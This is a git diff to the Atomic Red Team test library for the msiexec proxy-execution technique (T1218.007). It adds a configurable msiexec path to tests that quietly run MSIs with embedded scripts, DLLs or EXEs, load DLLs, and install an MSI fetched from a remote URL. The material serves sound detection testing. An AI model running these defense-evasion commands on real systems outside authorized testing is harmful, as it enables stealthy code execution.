diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index a9d04ae6..528e800d 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -35294,6 +35294,10 @@ defense-evasion: description: MSI file to execute type: Path default: PathToAtomicsFolder\T1218.007\src\T1218.007_JScript.msi + msi_exe: + description: MSIExec File Path + type: Path + default: c:\windows\system32\msiexec.exe action: description: 'Specifies the MSI action to perform: i (install), a (admin), j (advertise). The included MSI is designed to support all three action @@ -35314,7 +35318,7 @@ defense-evasion: ' executor: - command: 'msiexec.exe /q /#{action} "#{msi_payload}" + command: '#{msi_exe} /q /#{action} "#{msi_payload}" ' name: command_prompt @@ -35330,6 +35334,10 @@ defense-evasion: description: MSI file to execute type: Path default: PathToAtomicsFolder\T1218.007\src\T1218.007_VBScript.msi + msi_exe: + description: MSIExec File Path + type: Path + default: c:\windows\system32\msiexec.exe action: description: 'Specifies the MSI action to perform: i (install), a (admin), j (advertise). The included MSI is designed to support all three action @@ -35350,7 +35358,7 @@ defense-evasion: ' executor: - command: 'msiexec.exe /q /#{action} "#{msi_payload}" + command: '#{msi_exe} /q /#{action} "#{msi_payload}" ' name: command_prompt @@ -35366,6 +35374,10 @@ defense-evasion: description: MSI file to execute type: Path default: PathToAtomicsFolder\T1218.007\src\T1218.007_DLL.msi + msi_exe: + description: MSIExec File Path + type: Path + default: c:\windows\system32\msiexec.exe action: description: 'Specifies the MSI action to perform: i (install), a (admin), j (advertise). The included MSI is designed to support all three action @@ -35386,7 +35398,7 @@ defense-evasion: ' executor: - command: 'msiexec.exe /q /#{action} "#{msi_payload}" + command: '#{msi_exe} /q /#{action} "#{msi_payload}" ' name: command_prompt @@ -35402,6 +35414,10 @@ defense-evasion: description: MSI file to execute type: Path default: PathToAtomicsFolder\T1218.007\src\T1218.007_EXE.msi + msi_exe: + description: MSIExec File Path + type: Path + default: c:\windows\system32\msiexec.exe action: description: 'Specifies the MSI action to perform: i (install), a (admin), j (advertise). The included MSI is designed to support all three action @@ -35422,7 +35438,7 @@ defense-evasion: ' executor: - command: 'msiexec.exe /q /#{action} "#{msi_payload}" + command: '#{msi_exe} /q /#{action} "#{msi_payload}" ' name: command_prompt @@ -35588,6 +35604,10 @@ defense-evasion: description: DLL to execute that has an implemented DllRegisterServer function type: Path default: PathToAtomicsFolder\T1218.007\src\MSIRunner.dll + msi_exe: + description: MSIExec File Path + type: Path + default: c:\windows\system32\msiexec.exe dependency_executor_name: powershell dependencies: - description: 'The DLL must exist on disk at specified location (#{dll_payload}) @@ -35600,7 +35620,7 @@ defense-evasion: ' executor: - command: 'msiexec.exe /y "#{dll_payload}" + command: '#{msi_exe} /y "#{dll_payload}" ' name: command_prompt @@ -35619,6 +35639,10 @@ defense-evasion: function type: Path default: PathToAtomicsFolder\T1218.007\src\MSIRunner.dll + msi_exe: + description: MSIExec File Path + type: Path + default: c:\windows\system32\msiexec.exe dependency_executor_name: powershell dependencies: - description: 'The DLL must exist on disk at specified location (#{dll_payload}) @@ -35631,7 +35655,7 @@ defense-evasion: ' executor: - command: 'msiexec.exe /z "#{dll_payload}" + command: '#{msi_exe} /z "#{dll_payload}" ' name: command_prompt @@ -35649,8 +35673,12 @@ defense-evasion: description: MSI file to execute type: String default: https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.007/src/T1218.007_JScript.msi + msi_exe: + description: MSIExec File Path + type: Path + default: c:\windows\system32\msiexec.exe executor: - command: 'msiexec.exe /q /i "#{msi_payload}" + command: '#{msi_exe} /q /i "#{msi_payload}" ' name: command_prompt diff --git a/atomics/T1218.007/T1218.007.md b/atomics/T1218.007/T1218.007.md index e5788f42..0f999ae8 100644 --- a/atomics/T1218.007/T1218.007.md +++ b/atomics/T1218.007/T1218.007.md @@ -47,6 +47,7 @@ Executes an MSI containing embedded JScript code using msiexec.exe | Name | Description | Type | Default Value | |------|-------------|------|---------------| | msi_payload | MSI file to execute | Path | PathToAtomicsFolder\T1218.007\src\T1218.007_JScript.msi| +| msi_exe | MSIExec File Path | Path | c:\windows\system32\msiexec.exe| | action | Specifies the MSI action to perform: i (install), a (admin), j (advertise). The included MSI is designed to support all three action types. | String | i| @@ -54,7 +55,7 @@ Executes an MSI containing embedded JScript code using msiexec.exe ```cmd -msiexec.exe /q /#{action} "#{msi_payload}" +#{msi_exe} /q /#{action} "#{msi_payload}" ``` @@ -93,6 +94,7 @@ Executes an MSI containing embedded VBScript code using msiexec.exe | Name | Description | Type | Default Value | |------|-------------|------|---------------| | msi_payload | MSI file to execute | Path | PathToAtomicsFolder\T1218.007\src\T1218.007_VBScript.msi| +| msi_exe | MSIExec File Path | Path | c:\windows\system32\msiexec.exe| | action | Specifies the MSI action to perform: i (install), a (admin), j (advertise). The included MSI is designed to support all three action types. | String | i| @@ -100,7 +102,7 @@ Executes an MSI containing embedded VBScript code using msiexec.exe ```cmd -msiexec.exe /q /#{action} "#{msi_payload}" +#{msi_exe} /q /#{action} "#{msi_payload}" ``` @@ -139,6 +141,7 @@ Executes an MSI containing an embedded DLL using msiexec.exe | Name | Description | Type | Default Value | |------|-------------|------|---------------| | msi_payload | MSI file to execute | Path | PathToAtomicsFolder\T1218.007\src\T1218.007_DLL.msi| +| msi_exe | MSIExec File Path | Path | c:\windows\system32\msiexec.exe| | action | Specifies the MSI action to perform: i (install), a (admin), j (advertise). The included MSI is designed to support all three action types. | String | i| @@ -146,7 +149,7 @@ Executes an MSI containing an embedded DLL using msiexec.exe ```cmd -msiexec.exe /q /#{action} "#{msi_payload}" +#{msi_exe} /q /#{action} "#{msi_payload}" ``` @@ -185,6 +188,7 @@ Executes an MSI containing an embedded EXE using msiexec.exe | Name | Description | Type | Default Value | |------|-------------|------|---------------| | msi_payload | MSI file to execute | Path | PathToAtomicsFolder\T1218.007\src\T1218.007_EXE.msi| +| msi_exe | MSIExec File Path | Path | c:\windows\system32\msiexec.exe| | action | Specifies the MSI action to perform: i (install), a (admin), j (advertise). The included MSI is designed to support all three action types. | String | i| @@ -192,7 +196,7 @@ Executes an MSI containing an embedded EXE using msiexec.exe ```cmd -msiexec.exe /q /#{action} "#{msi_payload}" +#{msi_exe} /q /#{action} "#{msi_payload}" ``` @@ -415,13 +419,14 @@ Loads a DLL into msiexec.exe and calls its DllRegisterServer function. Note: the | Name | Description | Type | Default Value | |------|-------------|------|---------------| | dll_payload | DLL to execute that has an implemented DllRegisterServer function | Path | PathToAtomicsFolder\T1218.007\src\MSIRunner.dll| +| msi_exe | MSIExec File Path | Path | c:\windows\system32\msiexec.exe| #### Attack Commands: Run with `command_prompt`! ```cmd -msiexec.exe /y "#{dll_payload}" +#{msi_exe} /y "#{dll_payload}" ``` @@ -460,13 +465,14 @@ Loads a DLL into msiexec.exe and calls its DllUnregisterServer function. Note: t | Name | Description | Type | Default Value | |------|-------------|------|---------------| | dll_payload | DLL to execute that has an implemented DllUnregisterServer function | Path | PathToAtomicsFolder\T1218.007\src\MSIRunner.dll| +| msi_exe | MSIExec File Path | Path | c:\windows\system32\msiexec.exe| #### Attack Commands: Run with `command_prompt`! ```cmd -msiexec.exe /z "#{dll_payload}" +#{msi_exe} /z "#{dll_payload}" ``` @@ -505,13 +511,14 @@ Execute arbitrary MSI file retrieved remotely. Less commonly seen in application | Name | Description | Type | Default Value | |------|-------------|------|---------------| | msi_payload | MSI file to execute | String | https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.007/src/T1218.007_JScript.msi| +| msi_exe | MSIExec File Path | Path | c:\windows\system32\msiexec.exe| #### Attack Commands: Run with `command_prompt`! ```cmd -msiexec.exe /q /i "#{msi_payload}" +#{msi_exe} /q /i "#{msi_payload}" ``` diff --git a/atomics/T1218.007/T1218.007.yaml b/atomics/T1218.007/T1218.007.yaml index e82df5f9..6fe3f923 100644 --- a/atomics/T1218.007/T1218.007.yaml +++ b/atomics/T1218.007/T1218.007.yaml @@ -12,6 +12,10 @@ atomic_tests: description: MSI file to execute type: Path default: PathToAtomicsFolder\T1218.007\src\T1218.007_JScript.msi + msi_exe: + description: MSIExec File Path + type: Path + default: c:\windows\system32\msiexec.exe action: description: | Specifies the MSI action to perform: i (install), a (admin), j (advertise). The included MSI is designed to support all three action types. @@ -27,7 +31,7 @@ atomic_tests: Write-Host "You must provide your own MSI" executor: command: | - msiexec.exe /q /#{action} "#{msi_payload}" + #{msi_exe} /q /#{action} "#{msi_payload}" name: command_prompt - name: Msiexec.exe - Execute Local MSI file with embedded VBScript auto_generated_guid: 8d73c7b0-c2b1-4ac1-881a-4aa644f76064 @@ -40,6 +44,10 @@ atomic_tests: description: MSI file to execute type: Path default: PathToAtomicsFolder\T1218.007\src\T1218.007_VBScript.msi + msi_exe: + description: MSIExec File Path + type: Path + default: c:\windows\system32\msiexec.exe action: description: | Specifies the MSI action to perform: i (install), a (admin), j (advertise). The included MSI is designed to support all three action types. @@ -55,7 +63,7 @@ atomic_tests: Write-Host "You must provide your own MSI" executor: command: | - msiexec.exe /q /#{action} "#{msi_payload}" + #{msi_exe} /q /#{action} "#{msi_payload}" name: command_prompt - name: Msiexec.exe - Execute Local MSI file with an embedded DLL auto_generated_guid: 628fa796-76c5-44c3-93aa-b9d8214fd568 @@ -68,6 +76,10 @@ atomic_tests: description: MSI file to execute type: Path default: PathToAtomicsFolder\T1218.007\src\T1218.007_DLL.msi + msi_exe: + description: MSIExec File Path + type: Path + default: c:\windows\system32\msiexec.exe action: description: | Specifies the MSI action to perform: i (install), a (admin), j (advertise). The included MSI is designed to support all three action types. @@ -83,7 +95,7 @@ atomic_tests: Write-Host "You must provide your own MSI" executor: command: | - msiexec.exe /q /#{action} "#{msi_payload}" + #{msi_exe} /q /#{action} "#{msi_payload}" name: command_prompt - name: Msiexec.exe - Execute Local MSI file with an embedded EXE auto_generated_guid: ed3fa08a-ca18-4009-973e-03d13014d0e8 @@ -96,6 +108,10 @@ atomic_tests: description: MSI file to execute type: Path default: PathToAtomicsFolder\T1218.007\src\T1218.007_EXE.msi + msi_exe: + description: MSIExec File Path + type: Path + default: c:\windows\system32\msiexec.exe action: description: | Specifies the MSI action to perform: i (install), a (admin), j (advertise). The included MSI is designed to support all three action types. @@ -111,7 +127,7 @@ atomic_tests: Write-Host "You must provide your own MSI" executor: command: | - msiexec.exe /q /#{action} "#{msi_payload}" + #{msi_exe} /q /#{action} "#{msi_payload}" name: command_prompt - name: WMI Win32_Product Class - Execute Local MSI file with embedded JScript auto_generated_guid: 882082f0-27c6-4eec-a43c-9aa80bccdb30 @@ -236,6 +252,10 @@ atomic_tests: description: DLL to execute that has an implemented DllRegisterServer function type: Path default: PathToAtomicsFolder\T1218.007\src\MSIRunner.dll + msi_exe: + description: MSIExec File Path + type: Path + default: c:\windows\system32\msiexec.exe dependency_executor_name: powershell dependencies: - description: | @@ -246,7 +266,7 @@ atomic_tests: Write-Host "You must provide your own MSI" executor: command: | - msiexec.exe /y "#{dll_payload}" + #{msi_exe} /y "#{dll_payload}" name: command_prompt - name: Msiexec.exe - Execute the DllUnregisterServer function of a DLL auto_generated_guid: ab09ec85-4955-4f9c-b8e0-6851baf4d47f @@ -259,6 +279,10 @@ atomic_tests: description: DLL to execute that has an implemented DllUnregisterServer function type: Path default: PathToAtomicsFolder\T1218.007\src\MSIRunner.dll + msi_exe: + description: MSIExec File Path + type: Path + default: c:\windows\system32\msiexec.exe dependency_executor_name: powershell dependencies: - description: | @@ -269,7 +293,7 @@ atomic_tests: Write-Host "You must provide your own MSI" executor: command: | - msiexec.exe /z "#{dll_payload}" + #{msi_exe} /z "#{dll_payload}" name: command_prompt - name: Msiexec.exe - Execute Remote MSI file auto_generated_guid: 44a4bedf-ffe3-452e-bee4-6925ab125662 @@ -282,7 +306,11 @@ atomic_tests: description: MSI file to execute type: String default: https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.007/src/T1218.007_JScript.msi + msi_exe: + description: MSIExec File Path + type: Path + default: c:\windows\system32\msiexec.exe executor: command: | - msiexec.exe /q /i "#{msi_payload}" + #{msi_exe} /q /i "#{msi_payload}" name: command_prompt \ No newline at end of file